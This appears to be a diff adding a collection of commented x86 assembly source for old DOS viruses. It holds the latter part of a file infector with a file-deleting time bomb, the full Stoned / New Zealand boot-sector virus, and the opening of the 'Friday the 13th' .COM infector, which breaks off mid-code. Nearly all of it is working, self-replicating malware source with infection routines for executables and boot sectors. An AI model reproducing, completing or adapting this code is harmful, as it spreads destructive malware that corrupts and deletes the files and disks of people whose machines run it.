+    MOV  CX,0505H       ;UPPER LEFT CORNER
+    MOV  DX,1010H       ;LOWER RIGHT CORNER
+    INT  10H            ;
+    POP  BP             ;
+    POP  DX             ;
+    POP  CX             ;
+    POP  BX             ;
+    POP  AX             ;
+                        ;
+N08_10:  DEC  Word ptr CS:[A_FLAG]     ;
+    JMP  N08_90              ;  
+    MOV  Word ptr CS:[A_FLAG],1   ;
+                        ;
+    PUSH AX             ;
+    PUSH CX             ;
+    PUSH SI             ;  THIS DELAY CODE NEVER GETS EXECUTED  
+    MOV  CX,4001H       ;  IN THIS VERSION
+    REP  LODSB          ; 
+    POP  SI             ;
+    POP  CX             ;
+    POP  AX             ;
+                        ;
+N08_90:  JMP  far CS:[OLD_08]          ;PASS CONTROL TO OLD INT 08 VECTOR
+                        ;
+;-----------------------------------------------------------------------;
+; NEW INTERRUPT 21 HANDLER                            ;
+;-----------------------------------------------------------------------;
+NEW_21:  PUSHF               ;025B     ;
+    CMP  AH,0E0H             ;IF A E0 REQUEST...
+    JNE  N21_10              ;
+    MOV  AX,300H             ;...RETURN AX = 300H
+    POPF                ;   (OUR PUSHF)
+    IRET                ;
+                        ;
+N21_10:  CMP  AH,0DDH        ;0266     ;
+    JE   N21_30              ;IF DDH...JUMP TO _30
+    CMP  AH,0DEH             ;
+    JE   N21_40              ;IF DEH...JUMP TO _40
+    CMP  AX,4B00H       ;IF SPAWN A PROG...
+    JNE  N21_20              ;
+    JMP  N21_50              ;...JUMP TO _50
+                        ;
+N21_20:  POPF                ;   (OUR PUSHF)
+    JMP  far CS:[OLD_21]          ;ANY OTHER INT 21 GOES TO OLD VECTOR
+                        ;
+N21_30:  POP  AX             ;REMOVE OUR (PUSHF)
+    POP  AX             ;?
+    MOV  AX,100H             ;
+    MOV  CS:[000A],AX        ;
+    POP  AX             ;
+    MOV  CS:[000C],AX        ;
+    REP  MOVSB               ;
+    POPF                ;   (OUR PUSHF)
+    MOV  AX,CS:[000F]        ;
+    JMP  far CS:[000A]       ;
+                        ;
+N21_40:  ADD  SP,+06         ;0298     ;
+    POPF                ;   (OUR PUSHF)
+    MOV  AX,CS               ;
+    MOV  SS,AX               ;
+    MOV  SP,710H             ;SIZE OF VIRUS CODE
+    PUSH ES             ;
+    PUSH ES             ;02A4     06
+    XOR  DI,DI               ;02A5     33FF
+    PUSH CS             ;02A7     0E
+    POP  ES             ;02A8     07
+    MOV  CX,0010             ;02A9     B91000
+    MOV  SI,BX               ;02AC     8BF3
+    MOV  DI,0021             ;02AE     BF2100
+    REP  MOVSB               ;02B2     A4
+    MOV  AX,DS               ;02B3     8CD8
+    MOV  ES,AX               ;02B5     8EC0
+    MUL  Word ptr CS:[A007A] ;02B7     2EF7267A00
+    ADD  AX,CS:[002B]        ;02BC     2E03062B00
+    ADC  DX,+00              ;02C1     83D200
+    DIV  Word ptr CS:[A007A] ;02C4     2EF7367A00
+    MOV  DS,AX               ;02C9     8ED8
+    MOV  SI,DX               ;02CB     8BF2
+    MOV  DI,DX               ;02CD     8BFA
+    MOV  BP,ES               ;02CF     8CC5
+    MOV  BX,CS:[002F]        ;02D1     2E8B1E2F00
+    OR   BX,BX               ;02D6     0BDB
+    JE   02ED           ;02D8     7413
+    MOV  CX,8000             ;02DA     B90080
+    REP  MOVSW               ;02DE     A5
+    ADD  AX,1000             ;02DF     050010
+    ADD  BP,1000             ;02E2     81C50010
+    MOV  DS,AX               ;02E6     8ED8
+    MOV  ES,BP               ;02E8     8EC5
+    DEC  BX             ;02EA     4B
+    JNE  02DA           ;02EB     75ED
+    MOV  CX,CS:[002D]        ;02ED     2E8B0E2D00
+    REP  MOVSB               ;02F3     A4
+    POP  AX             ;02F4     58
+    PUSH AX             ;02F5     50
+    ADD  AX,0010             ;02F6     051000
+    ADD  CS:[0029],AX        ;02F9     2E01062900
+    ADD  CS:[0025],AX        ;02FE     2E01062500
+    MOV  AX,CS:[0021]        ;0303     2EA12100
+    POP  DS             ;0307     1F
+    POP  ES             ;0308     07
+    MOV  SS,CS:[0029]        ;0309     2E8E162900
+    MOV  SP,CS:[0027]        ;030E     2E8B262700
+    JMP  far CS:[0023]       ;0313     2EFF2E2300
+                        ;
+;---------------------------------------;
+; IT IS TIME FOR THIS FILE TO DIE...   ;
+; THIS IS WHERE IT GETS DELETED ! ;
+;---------------------------------------;
+N21_5A:  XOR  CX,CX               ;
+    MOV  AX,4301H       ;
+    INT  21H            ;CHANGE FILE MODE (ATT=0)
+                        ;
+    MOV  AH,41H              ;
+    INT  21H            ;DELETE A FILE
+                        ;
+    MOV  AX,4B00H       ;LOAD AND EXECUTE A PROGRAM
+    POPF                ;   (OUR PUSHF)
+    JMP  far CS:[OLD_21]          ;
+                        ;
+;---------------------------------------;
+; START INFECTION            ;
+;---------------------------------------;
+N21_50:  CMP  Byte ptr CS:[TIME_BOMB],1 ;032C ;IF TIME TO DIE...
+    JE   N21_5A              ;...JUMP
+                        ;
+    MOV  Word ptr CS:[HANDLE],-1  ;ASSUME NOT OPEN
+    MOV  Word ptr CS:[A008F],0    ;
+    MOV  word ptr CS:[HOST_NAME],DX   ;SAVE POINTER TO FILE NAME
+    MOV  word ptr CS:[HOST_NAME+2],DS ;
+                        ;
+;INFECTION PROCESS OCCURS HERE    ;
+    PUSH AX             ;034C     50
+    PUSH BX             ;034D     53
+    PUSH CX             ;034E     51
+    PUSH DX             ;034F     52
+    PUSH SI             ;0350     56
+    PUSH DI             ;0351     57
+    PUSH DS             ;0352     1E
+    PUSH ES             ;0353     06
+    CLD                 ;0354     FC
+    MOV  DI,DX               ;0355     8BFA
+    XOR  DL,DL               ;0357     32D2
+    CMP  Byte ptr [DI+01],3A ;0359     807D013A
+    JNE  L0364               ;035D     7505
+    MOV  DL,[DI]             ;035F     8A15
+    AND  DL,1F               ;0361     80E21F
+                        ;
+L0364:   MOV  AH,36               ;
+    INT  21H            ;GET DISK FREE SPACE
+    CMP  AX,-1               ;0368     3DFFFF
+    JNE  L0370               ;036B     7503
+L036D:   JMP  I_90           ;036D     E97702
+                        ;
+L0370:   MUL  BX             ;0370     F7E3
+    MUL  CX             ;0372     F7E1
+    OR   DX,DX               ;0374     0BD2
+    JNE  L037D               ;0376     7505
+    CMP  AX,710H             ;0378     3D1007
+    JC   L036D               ;037B     72F0
+L037D:   MOV  DX,word ptr CS:[HOST_NAME]
+    PUSH DS             ;0382     1E
+    POP  ES             ;0383     07
+    XOR  AL,AL               ;0384     32C0
+    MOV  CX,41               ;0386     B94100
+    REPNE     SCASB               ;038A     AE
+    MOV  SI,word ptr CS:[HOST_NAME]
+L0390:   MOV  AL,[SI]             ;0390     8A04
+    OR   AL,AL               ;0392     0AC0
+    JE   L03A4               ;0394     740E
+    CMP  AL,61               ;0396     3C61
+    JC   L03A1               ;0398     7207
+    CMP  AL,7A               ;039A     3C7A
+    JA   L03A1               ;039C     7703
+    SUB  Byte ptr [SI],20    ;039E     802C20
+L03A1:   INC  SI             ;03A1     46
+    JMP  L0390               ;03A2     EBEC
+                        ;
+L03A4:   MOV  CX,000B             ;03A4     B90B00
+    SUB  SI,CX               ;03A7     2BF1
+    MOV  DI,offset COMMAND_COM    ;03A9     BF8400
+    PUSH CS             ;03AC     0E
+    POP  ES             ;03AD     07
+    MOV  CX,000B             ;03AE     B90B00
+    REPE CMPSB               ;03B2     A6
+    JNE  L03B8               ;03B3     7503
+    JMP  I_90           ;03B5     E92F02
+                        ;
+L03B8:   MOV  AX,4300H       ;
+    INT  21H            ;CHANGE FILE MODE
+    JC   L03C4               ;03BD     7205
+                        ;
+    MOV  CS:[HOST_ATT],CX    ;03BF     ;
+L03C4:   JC   L03EB               ;03C4     7225
+    XOR  AL,AL               ;03C6     32C0
+    MOV  CS:[A004E],AL       ;03C8     2EA24E00
+    PUSH DS             ;03CC     1E
+    POP  ES             ;03CD     07
+    MOV  DI,DX               ;03CE     8BFA
+    MOV  CX,41               ;03D0     B94100
+    REPNZ     SCASB               ;03D4     AE
+    CMP  Byte ptr [DI-02],4D ;03D5     807DFE4D
+    JE   L03E6               ;03D9     740B
+    CMP  Byte ptr [DI-02],6D ;03DB     807DFE6D
+    JE   L03E6               ;03DF     7405
+    INC  Byte ptr CS:[A004E] ;03E1     2EFE064E00
+                        ;
+L03E6:   MOV  AX,3D00H       ;
+    INT  21H            ;OPEN FILE READ ONLY
+L03EB:   JC   L0447               ;
+    MOV  CS:[HANDLE],AX ;03ED     ;
+                        ;
+    MOV  BX,AX               ;MOVE TO END OF FILE -5
+    MOV  AX,4202             ;
+    MOV  CX,-1               ;FFFFFFFB
+    MOV  DX,-5               ;
+    INT  21H            ;MOVE FILE POINTER
+    JC   L03EB               ;
+                        ;
+    ADD  AX,5      ;0400     ;
+    MOV  CS:[A0011],AX       ;?SAVE HOST SIZE
+                        ;
+    MOV  CX,5      ;0407     ;READ LAST 5 BYTES OF HOST
+    MOV  DX,offset A006B          ;
+    MOV  AX,CS               ;
+    MOV  DS,AX               ;
+    MOV  ES,AX               ;
+    MOV  AH,3FH              ;
+    INT  21H            ;READ FROM A FILE
+                        ;
+    MOV  DI,DX          ;0417     ;CHECK IF LAST 5 BYTES = 'MsDos'
+    MOV  SI,offset MS_DOS    ;
+    REPE CMPSB               ;
+    JNE  L0427               ;
+    MOV  AH,3E               ;IF == 'MsDos'...
+    INT  21H            ;CLOSE FILE
+    JMP  I_90           ;...PASS CONTROL TO DOS
+                        ;
+L0427:   MOV  AX,3524             ;GET CRITICAL ERROR VECTOR
+    INT  21H            ;GET VECTOR
+    MOV  [OLD_24],BX         ;
+    MOV  [OLD_24+2],ES       ;
+                        ;
+    MOV  DX,offset NEW_24    ;
+    MOV  AX,2524             ;SET CRITICAL ERROR VECTOR
+    INT  21H            ;SET VECTOR
+                        ;
+    LDS  DX,dword ptr [HOST_NAME];
+    XOR  CX,CX               ;
+    MOV  AX,4301H       ;
+    INT  21H            ;CHANGE FILE MODE
+L0447:   JC   L0484               ;
+                        ;
+    MOV  BX,CS:[HANDLE]      ;
+    MOV  AH,3E               ;
+    INT  21H            ;CLOSE FILE
+                        ;
+    MOV  Word ptr CS:[HANDLE],-1  ;CLEAR HANDLE
+                        ;
+    MOV  AX,3D02             ;
+    INT  21H            ;OPEN FILE R/W
+    JC   L0484               ;
+                        ;
+    MOV  CS:[HANDLE],AX      ;0460     2EA37000
+    MOV  AX,CS               ;0464     8CC8
+    MOV  DS,AX               ;0466     8ED8
+    MOV  ES,AX               ;0468     8EC0
+    MOV  BX,[HANDLE]         ;046A     8B1E7000
+    MOV  AX,5700             ;046E     B80057
+    INT  21H            ;GET/SET FILE DATE TIME
+                        ;
+    MOV  [HOST_DATE],DX      ;0473     89167400
+    MOV  [HOST_TIME],CX      ;0477     890E7600
+    MOV  AX,4200             ;047B     B80042
+    XOR  CX,CX               ;047E     33C9
+    MOV  DX,CX               ;0480     8BD1
+    INT  21H            ;MOVE FILE POINTER
+L0484:   JC   L04C3               ;0484     723D
+                        ;
+    CMP  Byte ptr [A004E],00 ;0486     803E4E0000
+    JE   L0490               ;048B     7403
+    JMP  L04E6               ;048D     EB57
+                        ;
+    NOP                 ;048F     90
+L0490:   MOV  BX,1000             ;0490     BB0010
+    MOV  AH,48               ;0493     B448
+    INT  21H            ;ALLOCATE MEMORY
+    JNC  L04A4               ;0497     730B
+                        ;
+    MOV  AH,3E               ;0499     B43E
+    MOV  BX,[HANDLE]         ;049B     8B1E7000
+    INT  21H            ;CLOSE FILE (OBVIOUSLY)
+    JMP  I_90           ;04A1     E94301
+                        ;
+L04A4:   INC  Word ptr [A008F]    ;04A4     FF068F00
+    MOV  ES,AX               ;04A8     8EC0
+    XOR  SI,SI               ;04AA     33F6
+    MOV  DI,SI               ;04AC     8BFE
+    MOV  CX,710H             ;04AE     B91007
+    REP  MOVSB               ;04B2     A4
+    MOV  DX,DI               ;04B3     8BD7
+    MOV  CX,[A0011]          ;?GET HOST SIZE - YES
+    MOV  BX,[70H]       ;04B9     8B1E7000
+    PUSH ES             ;04BD     06
+    POP  DS             ;04BE     1F
+    MOV  AH,3FH              ;04BF     B43F
+    INT  21H            ;READ FROM A FILE
+L04C3:   JC   L04E1               ;04C3     721C
+                        ;
+    ADD  DI,CX               ;04C5     03F9
+                        ;
+    XOR  CX,CX               ;POINT TO BEGINNING OF FILE
+    MOV  DX,CX               ;
+    MOV  AX,4200H       ;
+    INT  21H            ;MOVE FILE POINTER
+                        ;
+    MOV  SI,offset MS_DOS    ;04D0     BE0500
+    MOV  CX,5           ;04D3     B90500
+    REP  CS:MOVSB       ;04D7     2EA4
+    MOV  CX,DI               ;04D9     8BCF
+    XOR  DX,DX               ;04DB     33D2
+    MOV  AH,40H              ;
+    INT  21H            ;WRITE TO A FILE
+L04E1:   JC   L04F0               ;
+    JMP  L05A2               ;
+                        ;
+;---------------------------------------;
+; READ EXE HEADER            ;
+;---------------------------------------;
+L04E6:   MOV  CX,1CH              ;READ EXE HEADER INTO BUFFER
+    MOV  DX,offset EXE_HDR   ;
+    MOV  AH,3F               ;
+    INT  21H            ;READ FILE
+    JC   L053C               ;
+                        ;
+;---------------------------------------;
+; TWEEK EXE HEADER TO INFECTED HSOT    ;
+;---------------------------------------;
+    MOV  Word ptr [EXE_HDR+18],1984H ;SAVE HOST'S EXE HEADER INFO
+    MOV  AX,[EXE_HDR+14]          ;   SS
+    MOV  [HOST_SS],AX        ;
+    MOV  AX,[EXE_HDR+16]          ;   SP
+    MOV  [HOST_SP],AX        ;
+    MOV  AX,[EXE_HDR+20]          ;   IP
+    MOV  [HOST_IP],AX        ;
+    MOV  AX,[EXE_HDR+22]          ;   CS
+    MOV  [HOST_CS],AX        ;
+    MOV  AX,[EXE_HDR+4]      ;   SIZE (IN 512 BLOCKS)
+    CMP  Word ptr [EXE_HDR+2],0   ;   SIZE MOD 512
+    JZ   L051B               ;IF FILE SIZE==0...JMP
+    DEC  AX             ;
+L051B:   MUL  Word ptr [BLOCK_SIZE]    ;
+    ADD  AX,[EXE_HDR+2]      ;
+    ADC  DX,0           ;AX NOW = FILE SIZE
+                        ;
+    ADD  AX,0FH              ;MAKE SURE FILE SIZE IS PARA. BOUND
+    ADC  DX,0           ;
+    AND  AX,0FFF0H      ;
+    MOV  [HOST_SIZE],AX      ;SAVE POINTER TO BEGINNING OF VIRUS
+    MOV  [HOST_SIZE+2],DX    ;
+                        ;
+    ADD  AX,710H             ;(SIZE OF VIRUS)
+    ADC  DX,0           ;
+L053C:   JC   L0578               ;IF > FFFFFFFF...JMP
+    DIV  Word ptr [BLOCK_SIZE]    ;
+    OR   DX,DX               ;
+    JE   L0547               ;
+    INC  AX             ;
+L0547:   MOV  [EXE_HDR+4],AX      ;
+    MOV  [EXE_HDR+2],DX      ;
+                        ;---------------;
+    MOV  AX,[HOST_SIZE]                ;DX:AX = HOST SIZE
+    MOV  DX,[HOST_SIZE+2]              ;
+    DIV  Word ptr [A007A]              ;
+    SUB  AX,[EXE_HEAD+8]                    ;SIZE OF EXE HDR
+    MOV  [EXE_HDR+22],AX                    ;VALUE OF CS
+    MOV  Word ptr [EXE_HDR+20],offset BEGIN_EXE  ;VALUE OF IP
+    MOV  [EXE_HDR+14],AX                    ;VALUE OF SS
+    MOV  Word ptr [EXE_HDR+16],710H         ;VALUE OF SP
+                        ;---------------;
+    XOR  CX,CX               ;POINT TO BEGINNING OF FILE (EXE HDR)
+    MOV  DX,CX               ;
+    MOV  AX,4200H       ;
+    INT  21H            ;MOVE FILE POINTER
+L0578:   JC   L0584               ;
+                        ;
+;---------------------------------------;
+; WRITE INFECTED EXE HEADER       ;
+;---------------------------------------;
+    MOV  CX,1CH              ;
+    MOV  DX,offset EXE_HDR   ;
+    MOV  AH,40H              ;
+    INT  21H            ;WRITE TO A FILE
+L0584:   JC   L0597               ;
+    CMP  AX,CX               ;
+    JNE  L05A2               ;
+                        ;
+    MOV  DX,[HOST_SIZE]      ;POINT TO END OF FILE
+    MOV  CX,[HOST_SIZE+2]    ;
+    MOV  AX,4200             ;
+    INT  21H            ;MOVE FILE POINTER
+L0597:   JC   L05A2               ;
+                        ;
+;---------------------------------------;
+; WRITE VIRUS CODE TO END OF HOST ;
+;---------------------------------------;
+    XOR  DX,DX               ;
+    MOV  CX,710H             ;(SIZE OF VIRUS)
+    MOV  AH,40H              ;
+    INT  21H            ;WRITE TO A FILE
+                        ;
+L05A2:   CMP  Word ptr CS:[008F],0     ;IF...
+    JZ   L05AE               ;...SKIP
+    MOV  AH,49H              ;
+    INT  21H            ;FREE ALLOCATED MEMORY
+                        ;
+L05AE:   CMP  Word ptr CS:[HANDLE],-1  ;IF ...
+    JE   I_90           ;...SKIP
+                        ;
+    MOV  BX,CS:[HANDLE]      ;RESTORE HOST'S DATE/TIME
+    MOV  DX,CS:[HOST_DATE]   ;
+    MOV  CX,CS:[HOST_TIME]   ;
+    MOV  AX,5701H       ;
+    INT  21H            ;GET/SET FILE DATE/TIME
+                        ;
+    MOV  AH,3EH              ;
+    INT  21H            ;CLOSE FILE
+                        ;
+    LDS  DX,CS:[HOST_NAME]   ;RESTORE HOST'S ATTRIBUTE
+    MOV  CX,CS:[HOST_ATT]    ;
+    MOV  AX,4301H       ;
+    INT  21H            ;CHANGE FILE MODE
+                        ;
+    LDS  DX,dword ptr CS:[OLD_24];RESTORE CRITICAL ERROR HANDLER
+    MOV  AX,2524H       ;
+    INT  21H            ;SET VECTOR
+                        ;
+I_90:    POP  ES             ;
+    POP  DS             ;
+    POP  DI             ;
+    POP  SI             ;
+    POP  DX             ;
+    POP  CX             ;
+    POP  BX             ;
+    POP  AX             ;
+    POPF                ;   (OUR PUSHF)
+    JMP  far CS:[OLD_21]          ;PASS CONTROL TO DOS
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------
+
+************************************************************************
+------------------------------------------------------------------------
+------------------------------------------------------------------------
+************************************************************************
+
+The "New Zealand Virus".
+Also called - Stoned, Marijuana, San Diego Virus, Smithsonian Virus
+
+
+CODE  SEGMENT
+
+   ASSUME   CS:CODE
+
+WORK_SPACE         EQU   512
+MAXIMUM_SIZE   EQU   1BEH
+
+VIRUS PROC  NEAR
+
+               DB    0EAH     ;JMP   07C0:0005
+               DW    5,7C0H
+               JMP   INSTALL
+
+;  DRIVE_LETTER INDICATES BOOT DISK,  0 = A:, 2 = C:
+
+DRIVE_LETTER        DB   0
+
+OLD_13  LABEL DWORD
+OFFS           DW   ?
+SEGM           DW   ?
+
+NEW_ADDRESS LABEL DWORD
+               DW   CONTINUE
+NEW_SEGMENT DW   0
+
+REBOOT    LABEL DWORD
+               DW   7C00H,0
+
+NEW_13:
+   PUSH  DS
+   PUSH  AX
+   CMP   AH,2             
+   JC    SPINNING         
+   CMP   AH,4
+   JNC   SPINNING         
+   OR    DL,DL             ; IS IT DRIVE A:?
+   JNZ   SPINNING          ; JUMP IF NOT
+   XOR   AX,AX
+   MOV   DS,AX             
+   MOV   AL,DS:43FH        ; IS DRIVE MOTOR SPINNING?
+   TEST  AL,1              ; IF YES THEN JUMP
+   JNZ   SPINNING
+               
+
+; INT13 REQUEST IS FOR READ OR WRITE TO A: - MOTOR NOT YET STARTED.
+
+   CALL  INFECT            ; NOT SPINNING - INFECT
+SPINNING:
+   POP   AX
+   POP   DS
+   JMP   CS:[OLD_13]     
+
+INFECT:
+   PUSH  BX                ; SAVE REGISTERS
+   PUSH  CX
+   PUSH  DX
+   PUSH  ES
+   PUSH  SI
+   PUSH  DI
+   MOV   SI,4              ; MAKE FOUR ATTEMPTS
+GET_BOOT_SECTOR:
+   MOV   AX,201H           ; READ SECTOR
+   PUSH  CS                
+   POP   ES                
+   MOV   BX,OFFSET WORK_SPACE
+   XOR   CX,CX             ; TRACK 0, SECTOR 0
+   MOV   DX,CX             ; HEAD 0, DRIVE 0
+   INC   CX                
+   PUSHF                   
+   CALL  CS:[OLD_13]
+   JNC   BOOT_IS_DONE      ; READ OK.
+   XOR   AX,AX             ; DRIVE RESET
+   PUSHF
+   CALL  CS:[OLD_13]
+   DEC   SI                ; COUNT NUMBER OF TRIES
+   JNZ   GET_BOOT_SECTOR   ; LOOP
+   JMP   FINISH        
+BOOT_IS_DONE:
+   XOR   SI,SI             ; CODE SEGMENT START 
+   MOV   DI,OFFSET WORK_SPACE  ; POINTER TO BOOT SECTOR
+   CLD                     
+   PUSH  CS      
+   POP   DS                
+   LODSW                   
+   CMP   AX,DS:[DI]        ; OURS?
+   JNZ   CREATE_BOOT       ; NO, CREATE BOOT
+   LODSW                   ; RETRY
+   CMP   AX,DS:[DI+2]      ; OURS?
+   JZ    FINISH            ; NO, FINISH UP
+CREATE_BOOT:
+   MOV   AX,301H           ; WRITE ORIGINAL BOOT SECTOR FROM BUFFER
+   MOV   BX,OFFSET WORK_SPACE  
+   MOV   CL,3              
+   MOV   DH,1              
+                           
+   PUSHF
+   CALL  CS:[OLD_13]     ; WRITE 
+   JC    FINISH        
+   MOV   AX,301H         
+   XOR   BX,BX           
+   MOV   CL,01           
+   XOR   DX,DX           
+   PUSHF
+   CALL  CS:[OLD_13]     
+FINISH:
+   POP   DI                ; RESTORE REGISTERS
+   POP   SI
+   POP   ES
+   POP   DX
+   POP   CX
+   POP   BX
+   RET
+
+INSTALL:
+   XOR   AX,AX
+   MOV   DS,AX
+   CLI
+   MOV   SS,AX
+   MOV   SP,7C00H        
+   STI                     ; ENABLE INTERRUPTS
+   MOV   AX,DS:4CH         ; SAVE OLD 13H 
+   MOV   DS:[OFFS+7C00H],AX
+   MOV   AX,DS:4EH
+   MOV   DS:[SEGM+7C00H],AX
+   MOV   AX,DS:413H        ; MEMORY AVAILABLE 
+   DEC   AX                
+   DEC   AX                
+   MOV   DS:413H,AX        
+   MOV   CL,6 
+   SHL   AX,CL
+   MOV   ES,AX                          ; ES: = FREE MEMORY ADDRESS
+   MOV   DS:[NEW_SEGMENT+7C00H],AX   ; PUT IT INTO NEW JUMP VECTOR
+
+   MOV   AX,OFFSET NEW_13             ; INSTALL NEW VIRUS VECTOR
+   MOV   DS:4CH,AX
+   MOV   DS:4EH,ES
+
+   MOV   CX,OFFSET ENDOFPROGMEM
+   PUSH  CS
+   POP   DS                ; DS POINTS TO OUR CODE SEGMENT
+   XOR   SI,SI             ; SI POINTS TO 0
+   MOV   DI,SI             ; DI POINTS TO 0
+   CLD                     ; SET DIRECTION FLAG TO INCREMENT
+   REP   MOVSB             ; MOVE OURSELVES INTO HIGH MEMORY!
+   JMP   NEW_ADDRESS    ; THIS JUMP TRANSFERS TO CONTINUE BUT IN HIGH MEM
+
+
+; THE FOLLOWING CODE IS EXECUTED AFTER BEING MOVED TO HIGH MEMORY
+; EXECUTION IS VIA THE JUMP TO NEW_ADDRESS
+
+CONTINUE:
+   MOV   AX,0              ; RESET DISK SYSTEM
+   INT   13H               ; THIS IS THE INFECTED INT 13H
+
+   XOR   AX,AX             ; READ REAL BOOT SECTOR
+   MOV   ES,AX
+   MOV   AX,201H
+   MOV   BX,7C00H          ; INTO THE BOOT AREA OF RAM
+   CMP   DRIVE_LETTER,0
+   JZ    BOOT_A
+BOOT_C:
+   MOV   CX,0002H          ; FROM SECTOR 2 TRACK 0  HEAD 0 FOR FIRST HD
+   MOV   DX,0080H
+   INT   13H
+   JMP   QUITPROG
+BOOT_A:
+   MOV   CX,0003H          ; FROM SECTOR 3 TRACK 0 HEAD 1 FOR DRIVE A:
+   MOV   DX,0100H
+   INT   13H
+   JC    QUITPROG          ; FAILED READ!
+
+   TEST  BYTE PTR ES:46CH,7   ; CHECK SYSTEM CLOCK LAST 3 BITS
+   JNZ   NOMESSAGE
+   MOV   SI,OFFSET MESSAGE    ; DS IS POINTING TO 7C0:000 WHICH
+   PUSH  CS
+   POP   DS
+MSGLOOP:
+   LODSB                   ; ALSO HAS THE TEXT
+   OR    AL,AL
+   JZ    NOMESSAGE
+   MOV   AH,14
+   MOV   BH,0
+   INT   10H
+   JMP   MSGLOOP
+
+NOMESSAGE:
+   PUSH  CS
+   POP   ES
+   MOV   AX,201H
+   MOV   BX,OFFSET WORK_SPACE  ; READ BOOT SECTOR FROM HARD DISK
+   MOV   CL,1    
+   MOV   DX,0080H
+   INT   13H
+   JC    QUITPROG          ; BAD READ - SO JUMP
+   PUSH  CS
+   POP   DS
+   MOV   SI,OFFSET WORK_SPACE  ; SOURCE IS THE BOOT SECTOR
+   MOV   DI,0              ; DESTINATION IS OUR OWN CODE
+   LODSW                   ; MOV  AX,DS:[SI]
+                           ; ADD  SI,2
+   CMP   AX,DS:[DI]        ; VIRUS?
+   JNZ   SAVEBOOT          ; JUMP IF NOT
+   LODSW                   ; MOV  AX,DS:[SI]
+                           ; ADD  SI,2
+   CMP   AX,DS:[DI+2]      ; HAS IT GOT A VIRUS?
+   JNZ   SAVEBOOT
+QUITPROG:
+   MOV   DRIVE_LETTER,0         ; YES - SO BOOT DRIVE 0 FOR A>
+   JMP   REBOOT            ; THIS JUMPS TO 0:7C00H TO CONTINUE BOOT CODE
+
+SAVEBOOT:
+   MOV   DRIVE_LETTER,2         ; DRIVE 2 FOR C>
+   MOV   AX,301H           ; GONNA WRITE
+   MOV   BX,OFFSET WORK_SPACE  ; OLD BOOT SECTOR
+   MOV   CX,0007H          ; TO SECTOR 7
+   MOV   DX,0080H          ;       OF DRIVE C>
+   INT   13H
+   JC    QUITPROG
+   PUSH  CS
+   POP   DS
+   PUSH  CS
+   POP   ES
+   MOV   SI,OFFSET WORK_SPACE+MAXIMUM_SIZE
+   MOV   DI,MAXIMUM_SIZE
+   MOV   CX,400H-MAXIMUM_SIZE
+   REP   MOVSB             ; SI -> DI AND INC BOTH    CX TIMES
+   MOV   AX,301H           ; GONNA WRITE BOOT SECTOR
+   XOR   BX,BX             ; FROM TOP OF OUR CODE
+   INC   CL                ; SECTOR 1
+;  MOV   DX,0080H          ;<-- DX IS LEFT OVER FROM ABOVE
+   INT   13H               ; DO IT
+   JMP   QUITPROG
+                      
+MESSAGE:
+         DB 7,'Your PC is now Stoned!',7,13,10,10,0
+         DB 'LEGALISE MARIJUANA!'    ; This bit doesn't display!
+ENDOFPROGMEM:
+
+VIRUS ENDP
+
+CODE  ENDS
+   END   VIRUS
+
+
+*****************************************************************
+-----------------------------------------------------------------
+-----------------------------------------------------------------
+*****************************************************************
+
+The original 'Friday the 13th"
+Also called - Munich Virus, Miami Virus
+
+
+
+ 
+;-----------------------------------------------------------------------;
+; THE METHOD OF INFECTION:                           ;
+; SAVE FIRST 3 BYTES OF HOST TO SAVE AREA INSIDE OF VIRIUL SHELL     ;
+; APPEND VIRIUL SHELL TO END OF .COM FILE (ON A PARAGRAPH BOUNDARY!) ;
+;-----------------------------------------------------------------------;
+; ATTENTION!                                     ;
+; RESULTING FILE APPARENTLY MUST BE < 64K                            ;
+; REMEMBER THE STACK IS AT THE TOP OF THE 64K FILE! WHERE SHELL RESIDES   ;
+; STACK MUST HAVE ROOM FOR VIRUS USE                       ;
+;-----------------------------------------------------------------------;
+CODE     SEGMENT PUBLIC 'CODE'         ;
+    ASSUME    CS:CODE,DS:CODE,ES:CODE,SS:CODE
+                        ;
+    ORG  100H           ;SAME A .COM FILE FOR NOW
+                        ;
+    PUBLIC    HOST_SIZE      ;;
+                        ;
+;-----------------------------------------------------------------------;
+; JUMP AROUND VIRUS DATA AREA                              ;
+;-----------------------------------------------------------------------;
+BEGIN:   JMP  CONTINUE       ;
+                        ;
+;-----------------------------------------------------------------------;
+; SHELL DATA AREA APPARENTLY FOLLOWS                            ;
+;-----------------------------------------------------------------------;
+HOST_3        DB   ?,?,?          ;FIRST 3 BYTES OF HOST
+ID       DB   'INFECTED',0   ;FYI ALREADY INFECTED ID
+                        ;
+NEW_3         DB   0E9H      ;TO REPLACE FIRST 3 BYTES OF HOST
+OUR_BEGIN     DW   ?         ;
+                        ;
+HOST_TYPE     DB   '*.COM',0 ;TYPE OF FILES TO INFECT
+                        ;
+DTA      DB   21 DUP (?)     ;USED BY DOS
+         DB   ?         ;FILE ATTRIBUTE
+         DW   ?         ;FILES TIME
+         DW   ?         ;FILES DATE
+HOST_SIZE     DW   ?         ;FILE SIZE
+         DW   ?         ;FILE SIZE
+HOST_NAME     DB   13 DUP (?)     ;FILE NAME
+                        ;
+COMMAND_COM   DB   'COMMAND.COM',0     ;
+COMMAND_LENGTH     EQU  $ - offset COMMAND_COM
+                        ;
+;-----------------------------------------------------------------------;
+; SAVE INCOMMING ENVIRONMENT AND SETUP WORKING ENVIRONMENT      ;
+;-----------------------------------------------------------------------;
+CONTINUE:                    ;
+    PUSH CS             ;SAVE HOST SEGMENT
+    PUSH AX             ;SAVE SPACE FOR HOST offset
+                        ;
+    PUSH AX             ;SAVE INCOMMING REGs
+    PUSH BX             ;
+    PUSH CX             ;
+    PUSH DX             ;
+    PUSH SI             ;
+    PUSH DI             ;
+    PUSH BP             ;
+    PUSH DS             ;! NOT ES !
+                        ;
+    MOV  BP,SP               ;SAVE HOST offset (IN STACK)
+    MOV  word ptr [BP+16],100H    ;   (FOR LATER RETF TO HOST)
+                        ;
+    CALL DUMMY               ;MOV AX,IP
+DUMMY:   POP  AX             ;
+    SUB  AX,(offset DUMMY - offset BEGIN)
+                        ;
+    MOV  CL,4           ;PASS CONTROL TO OURSELF WITH IP=100H
+    SHR  AX,CL               ;
+    MOV  BX,CS               ;
+    ADD  AX,BX               ;
+    SUB  AX,10H              ;
+    PUSH AX             ;(OUR MODIFIED CS)
+    MOV  AX,offset IN_CONTROL     ;(OUR IP)
+    PUSH AX             ;
+    RETF                ;
+                        ;
+;-----------------------------------------------------------------------;
+;-----------------------------------------------------------------------;
+IN_CONTROL:                  ;
+    MOV  AX,CS               ;(INIT DS)
